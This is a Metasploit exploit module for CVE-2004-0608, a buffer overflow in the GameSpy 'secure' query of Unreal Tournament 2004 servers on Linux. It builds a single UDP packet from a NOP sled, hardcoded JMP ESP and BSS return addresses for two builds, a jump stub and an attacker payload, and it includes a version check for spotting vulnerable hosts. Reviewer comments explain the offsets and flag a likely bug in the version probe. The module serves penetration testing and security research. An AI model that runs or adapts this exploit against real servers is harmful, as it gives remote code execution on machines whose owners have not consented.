##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Module metadata for CVE-2004-0608 (GameSpy "secure" query overflow in the
  # Unreal Engine).  Each target carries two 'Rets' addresses that #exploit
  # writes into the request buffer at fixed offsets; the inline comment on the
  # first target labels them as a JMP ESP and a (free/realloc) BSS pointer.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
        'Description' => %q{
          This is an exploit for the GameSpy secure query in
          the Unreal Engine.

          This exploit only requires one UDP packet, which can
          be both spoofed and sent to a broadcast address.
          Usually, the GameSpy query server listens on port 7787,
          but you can manually specify the port as well.

          The RunServer.sh script will automatically restart the
          server upon a crash, giving us the ability to
          bruteforce the service and exploit it multiple
          times.
        },
        'Author' => [ 'onetwo' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2004-0608'],
          [ 'OSVDB', '7217'],
          [ 'BID', '10570'],

        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 512,
          # 0x5c is the backslash that delimits GameSpy keys (see the
          # '\secure\' prefix in #exploit); 0x00 is the usual C terminator.
          'BadChars' => "\x5c\x00"

        },
        'Platform' => 'linux',
        'Targets' => [
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], # JMP ESP , (free/realloc) BSS pointer
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
        ],
        'DisclosureDate' => '2004-06-18',
        # Stability/SideEffects: the target service crashes on every attempt
        # (RunServer.sh restarts it, per the Description) and the traffic is
        # expected to show up in logs.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7787) # default GameSpy query port named in the Description
      ]
    )
  end

  # Sends the single UDP datagram that triggers the overflow.
  #
  # The request is a 1024-byte NOP sled with the target's 'Rets' values
  # (packed as 32-bit little-endian via 'V') written at offsets 24, 44 and 56,
  # a 6-byte stub at offset 48, the GameSpy '\secure\' keyword at offset 0 and
  # the encoded payload occupying the tail of the buffer.  Nothing is read
  # back: the socket is released straight after the write, once #handler has
  # been given the chance to pick up a session.
  #
  # On the wire this is one 1024-byte datagram to RPORT beginning with
  # '\secure\' -- in contrast to the short '\basic\' probe sent by #ut_version,
  # which is what a network monitor would key on.
  def exploit
    connect_udp

    buf = make_nops(1024)
    buf[24, 4] = [target['Rets'][1]].pack('V')
    buf[44, 4] = [target['Rets'][0]].pack('V')
    buf[56, 4] = [target['Rets'][1]].pack('V')
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" # LEA/JMP

    buf[0, 8] = '\\secure\\'
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    handler
    disconnect_udp
  end

  # Probes the GameSpy query port with '\basic\' and extracts the game
  # version the server reports.
  #
  # @return [String, nil] the digits captured after '\gamever\' in the reply,
  #   or nil when there is no reply or no match
  #
  # NOTE(review): Rex::Socket::Udp#recvfrom returns a [data, host, port]
  # triple rather than a String, so `res.match` as written looks like it
  # needs to operate on the data element (res[0]) -- confirm against the Rex
  # version in use; if it raises, #check never reaches its version logic.
  def ut_version
    connect_udp
    udp_sock.put('\\basic\\')
    res = udp_sock.recvfrom(8192)
    disconnect_udp

    if res && (m = res.match(/\\gamever\\([0-9]{1,5})/))
      return m[1]
    end

    return
  end

  # Vulnerability check driven by the version string from #ut_version.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no version could be read,
  #   Appears for builds 3120/3186/3204, Detected for a 2xxx build (reported
  #   as UT2003), Safe for anything else
  #
  # Note that 3204 is accepted as "Appears" here although the Targets list
  # only has entries for builds 3120 and 3186.  The ^/$ anchors are safe in
  # this case because vers is a digits-only capture from #ut_version.
  def check
    vers = ut_version

    if !vers
      return CheckCode::Unknown('Could not detect Unreal Tournament Server')
    end

    print_status("Detected Unreal Tournament Server Version: #{vers}")

    if (vers =~ /^(3120|3186|3204)$/)
      return CheckCode::Appears('This system appears to be exploitable')
    end

    if (vers =~ /^(2...)$/)
      return CheckCode::Detected('This system appears to be running UT2003')
    end

    return CheckCode::Safe('This system appears to be patched')
  end
end